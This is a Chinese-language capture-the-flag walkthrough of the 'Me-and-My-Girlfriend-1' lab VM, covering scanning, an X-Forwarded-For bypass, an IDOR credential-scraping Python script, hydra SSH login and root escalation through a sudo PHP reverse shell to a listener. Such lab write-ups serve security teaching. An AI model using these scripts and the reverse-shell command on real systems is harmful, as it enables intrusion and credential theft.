Me-and-My-Girlfriend-1
阿新 • • 發佈:2022-03-10
Me-and-My-Girlfriend-1
目錄1 資訊收集
1.1 埠掃描
┌──(kali㉿kali)-[~] └─$ nmap -sV -T4 -p - 192.168.0.3 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 19:54 CST Nmap scan report for 192.168.0.3 Host is up (0.00049s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1.2 後臺目錄掃描
┌──(kali㉿kali)-[~] └─$ dirsearch -u http://192.168.0.3/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [20:43:35] Starting: [20:43:35] 301 - 308B - /misc -> http://192.168.0.3/misc/ [20:43:38] 301 - 310B - /config -> http://192.168.0.3/config/ [20:56:50] 200 - 120B - /index.php [20:56:58] 200 - 32B - /robots.txt [20:47:35] 403 - 291B - /server-status Task Completed
1.2.1 目錄分析
-
訪問
http://192.168.0.3/
發現有IP限制,檢視頁面程式碼資訊,發現需要利用X-Forwarded-For Header繞過 -
火狐下載外掛:
X-Forwarded-For Header
,並配置IP地址為:127.0.0.1
,請求頭選擇X-Forwarded-For
-
利用
X-Forwarded-For Header
外掛成功訪問到目標網站:http://192.168.0.3/?page=index
-
在目標網站上註冊test使用者
-
成功登入後臺:
http://192.168.0.3/index.php?page=dashboard
-
在
http://192.168.0.3/index.php?page=profile&user_id=12
user_id=12
改為user_id=1
# 通過水平越權得到註冊的使用者資訊如下: Eweuh Tandingan eweuhtandingan skuyatuh
-
編寫指令碼嘗試獲取所有使用者的賬號密碼:
import requests, re def get_user_pass(uid): uid = uid t_url = 'http://192.168.0.3/index.php?page=profile&user_id=%s' % uid t_cookie = { "PHPSESSID":"ua2kg2n1inkvdbdcohitotsgg5" } t_headers = {"X-Forwarded-For":"127.0.0.1"} getreq = requests.get(url=t_url, cookies=t_cookie,headers=t_headers).text # match name getname = re.search( "id=\"name\" value=\"(.*?)\">",getreq).group(1) # match username getusername = re.search( "id=\"username\" value=\"(.*?)\">",getreq).group(1) # match passwd getpasswd = re.search( "id=\"password\" value=\"(.*?)\">",getreq).group(1) return getname,getusername,getpasswd if __name__ == '__main__': for i in range(20): getname,getusername,getpasswd = get_user_pass(i) if getname: print("%s:%s"%(getusername,getpasswd))
-
得到以下結果:
eweuhtandingan:skuyatuh aingmaung:qwerty!!! sundatea:indONEsia sedihaingmah:cedihhihihi alice:4lic3 abdikasepak:dorrrrr test:Admin123
-
http://192.168.0.3/robots.txt
-
http://192.168.0.3/heyhoo.txt
2 GetShell
2.1 利用收集的資訊嘗試ssh登入目標主機
# hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -C user-pass ssh://192.168.0.3
# 得到:ssh登入賬號與密碼
alice:4lic3
-
-C
: FILE 檔案格式為 "login:pass"
2.2 成功登入
# 獲得第一個flag
alice@gfriEND:~$ cat .my_secret/flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
3 提權
3.1 嘗試提權
sudo su -
提權失敗
3.2 收集當前系統資訊
-
檢視
/etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:106::/var/run/dbus:/bin/false landscape:x:103:109::/var/lib/landscape:/bin/false alice:x:1000:1001:Alice Geulis,1337,+62,+62:/home/alice:/bin/bash eweuhtandingan:x:1001:1002:,,,:/home/eweuhtandingan:/bin/bash aingmaung:x:1002:1003:,,,:/home/aingmaung:/bin/bash sundatea:x:1003:1004:,,,:/home/sundatea:/bin/bash sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
-
SUID提權:沒啥可利用的
alice@gfriEND:~$ find / -perm -u=s 2>/dev/null /bin/ping6 /bin/ping /bin/umount /bin/mount /bin/su /bin/fusermount /usr/bin/chsh /usr/bin/gpasswd /usr/bin/mtr /usr/bin/pkexec /usr/bin/at /usr/bin/traceroute6.iputils /usr/bin/passwd /usr/bin/chfn /usr/bin/newgrp /usr/bin/sudo /usr/sbin/uuidd /usr/sbin/pppd /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1
-
檢視當前系統中的使用者所建立的檔案:沒啥東東
alice@gfriEND:~$ find / -user 1000 2>/dev/null /home/alice /home/alice/.bashrc /home/alice/.cache /home/alice/.cache/motd.legal-displayed /home/alice/.bash_logout /home/alice/.bash_history /home/alice/.profile /home/alice/.my_secret /home/alice/.my_secret/my_notes.txt alice@gfriEND:~$ find / -user 1001 2>/dev/null /home/eweuhtandingan /home/eweuhtandingan/.bashrc /home/eweuhtandingan/.bash_logout /home/eweuhtandingan/.profile alice@gfriEND:~$ find / -user 1002 2>/dev/null /home/aingmaung /home/aingmaung/.bashrc /home/aingmaung/.bash_logout /home/aingmaung/.profile alice@gfriEND:~$ find / -user 1003 2>/dev/null /home/sundatea /home/sundatea/.bashrc /home/sundatea/.bash_logout /home/sundatea/.profile alice@gfriEND:~$
-
查詢敏感檔案
alice@gfriEND:/var/www/html$ cat config/config.php <?php $conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp'); alice@gfriEND:/var/www/html$
-
檢視當前alice使用者是否擁有sudo許可權
alice@gfriEND:~$ sudo -l Matching Defaults entries for alice on gfriEND: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User alice may run the following commands on gfriEND: (root) NOPASSWD: /usr/bin/php
3.3 sudo php提權
alice@gfriEND:~$ sudo php -r '$sock=fsockopen("192.168.0.2",2333);exec("/bin/bash -i <&3 >&3 2>&3");'
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.0.2] from (UNKNOWN) [192.168.0.3] 57734
root@gfriEND:~# cat flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:/root#